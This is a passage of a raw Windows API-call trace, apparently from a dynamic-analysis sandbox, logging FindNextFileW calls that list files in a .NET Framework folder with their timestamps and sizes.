[0101.721] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f556dc, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97ad6433, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97ad6433, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xdba9, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallSqlStateTemplate.sql", cAlternateFileName="INB4D7~1.SQL")) returned 1 [0101.721] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920cf89c, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x920cf89c, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x920d0bdf, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xa0b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallUtil.exe", cAlternateFileName="")) returned 1 [0101.721] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61dd9bf5, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61dd9bf5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61dd9bf5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb6, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallUtil.exe.config", cAlternateFileName="")) returned 1 [0101.721] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e3f8a84, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e3f8a84, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e3f9e1c, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x10ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallUtilLib.dll", cAlternateFileName="")) returned 1 [0101.721] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f556dc, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97ad6433, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97ad6433, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1939, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallWebEventSqlProvider.sql", cAlternateFileName="INDA80~1.SQL")) returned 1 [0101.722] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e74254, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93e74254, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93e75656, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x116b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISymWrapper.dll", cAlternateFileName="")) returned 1 [0101.722] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e268467, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e268467, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e2697ea, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xb688, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsc.exe", cAlternateFileName="")) returned 1 [0101.722] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f7b933, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97ad6433, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97ad6433, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x119, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsc.exe.config", cAlternateFileName="JSCEXE~1.CON")) returned 1 [0101.722] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61c826cf, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61c826cf, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61c826cf, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x66738, dwReserved0=0x0, dwReserved1=0x0, cFileName="locale.nlp", cAlternateFileName="")) returned 1 [0101.723] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91a70006, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91a70006, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91a70006, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xd0e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Activities.Build.dll", cAlternateFileName="")) returned 1 [0101.723] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93a69172, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93a69172, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93a6a40c, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x14cf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.Conversion.v4.0.dll", cAlternateFileName="")) returned 1 [0101.723] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93d827ab, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93d827ab, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93d9d5be, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1592c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.dll", cAlternateFileName="")) returned 1 [0101.723] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93b30006, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93b30006, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93b37514, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xa0ee0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.Engine.dll", cAlternateFileName="")) returned 1 [0101.723] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93ceb1c8, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93ceb1c8, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93cec547, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x186e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.Framework.dll", cAlternateFileName="")) returned 1 [0101.724] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dec26d0, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dec26d0, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8ded1114, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x11e2f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.Tasks.v4.0.dll", cAlternateFileName="")) returned 1 [0101.724] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93c0e2cb, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93c0e2cb, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93c130c5, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x41d00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.Utilities.v4.0.dll", cAlternateFileName="")) returned 1 [0101.724] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fa1b8d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97ad6433, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97ad6433, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x936, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Build.xsd", cAlternateFileName="MICROS~1.XSD")) returned 1 [0101.724] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62c27d92, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x62c27d92, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x62c27d92, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1899, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Common.OverrideTasks", cAlternateFileName="")) returned 1 [0101.724] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61be9d6d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61be9d6d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61be9d6d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x40193, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Common.targets", cAlternateFileName="")) returned 1 [0101.725] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62c27d92, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x62c27d92, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x62c27d92, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a32, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Common.Tasks", cAlternateFileName="")) returned 1 [0101.725] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c5d27e, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91c5d27e, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91c6480f, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x76cc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.CSharp.dll", cAlternateFileName="")) returned 1 [0101.726] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61be9d6d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61be9d6d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61be9d6d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5c42, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.CSharp.targets", cAlternateFileName="")) returned 1 [0101.726] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9398ae28, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x9398ae28, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9398c145, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xcd08, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Data.Entity.Build.Tasks.dll", cAlternateFileName="")) returned 1 [0101.727] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61dffe50, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61dffe50, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61dffe50, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1965, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Data.Entity.targets", cAlternateFileName="")) returned 1 [0101.727] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2eadf9, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e2eadf9, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e2ec12a, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x2d308, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Internal.Tasks.Dataflow.dll", cAlternateFileName="")) returned 1 [0101.727] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93b6d04f, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93b6d04f, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93b76d28, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xb80c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.JScript.dll", cAlternateFileName="")) returned 1 [0101.727] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93ec5f89, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93ec5f89, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93ec7303, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xe600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.JScript.tlb", cAlternateFileName="")) returned 1 [0101.727] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61be9d6d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61be9d6d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61be9d6d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2eb5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.NETFramework.props", cAlternateFileName="")) returned 1 [0101.728] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61be9d6d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61be9d6d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61be9d6d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ff7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.NETFramework.targets", cAlternateFileName="")) returned 1 [0101.728] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x611a1b54, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x611a1b54, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x611c7daa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2637, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.ServiceModel.targets", cAlternateFileName="")) returned 1 [0101.728] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91bc222f, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91bc222f, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91bc5cbe, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x60b08, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Transactions.Bridge.dll", cAlternateFileName="")) returned 1 [0101.728] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93974ec3, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93974ec3, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x939761fd, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x20108, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Transactions.Bridge.Dtc.dll", cAlternateFileName="")) returned 1 [0101.729] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dbb348f, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dbb348f, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dbd91fc, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x2c7128, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualBasic.Activities.Compiler.dll", cAlternateFileName="")) returned 1 [0101.729] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x919d2884, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x919d2884, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x919d4f76, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1c920, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualBasic.Compatibility.Data.dll", cAlternateFileName="")) returned 1 [0101.729] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91a5182f, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91a5182f, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91a565b8, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x79910, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualBasic.Compatibility.dll", cAlternateFileName="")) returned 1 [0101.729] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e1e1ff3, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e1e1ff3, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e1e94e8, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x9c4e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualBasic.dll", cAlternateFileName="")) returned 1 [0101.729] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x919dd872, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x919dd872, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x919debbf, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x597b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualBasic.targets", cAlternateFileName="")) returned 1 [0101.730] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x539b6eaa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x539b6eaa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x539b6eaa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x76c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualC.Dll", cAlternateFileName="")) returned 1 [0101.730] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54eb99fc, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x54eb99fc, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x54eb99fc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc6e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualC.STLCLR.dll", cAlternateFileName="")) returned 1 [0101.730] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61ebea10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61ebea10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61ee4c67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb0d64, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.ApplicationServer.Applications.45.man", cAlternateFileName="")) returned 1 [0101.730] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9230acc8, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x9230acc8, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9230c04f, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x22588, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.ApplicationServer.Applications.dll", cAlternateFileName="")) returned 1 [0101.730] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61d4128b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61d4128b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61d4128b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa4e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WinFx.targets", cAlternateFileName="")) returned 1 [0101.731] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93c157dd, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93c157dd, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93c16bb1, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x80f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Workflow.Compiler.exe", cAlternateFileName="")) returned 1 [0101.731] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6121425b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x6121425b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x6121425b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x90, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Workflow.Compiler.exe.config", cAlternateFileName="")) returned 1 [0101.731] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61e7255f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61e7255f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61e7255f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d71, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WorkflowBuildExtensions.targets", cAlternateFileName="")) returned 1 [0101.731] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e311f7d, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e311f7d, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e3132bf, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, 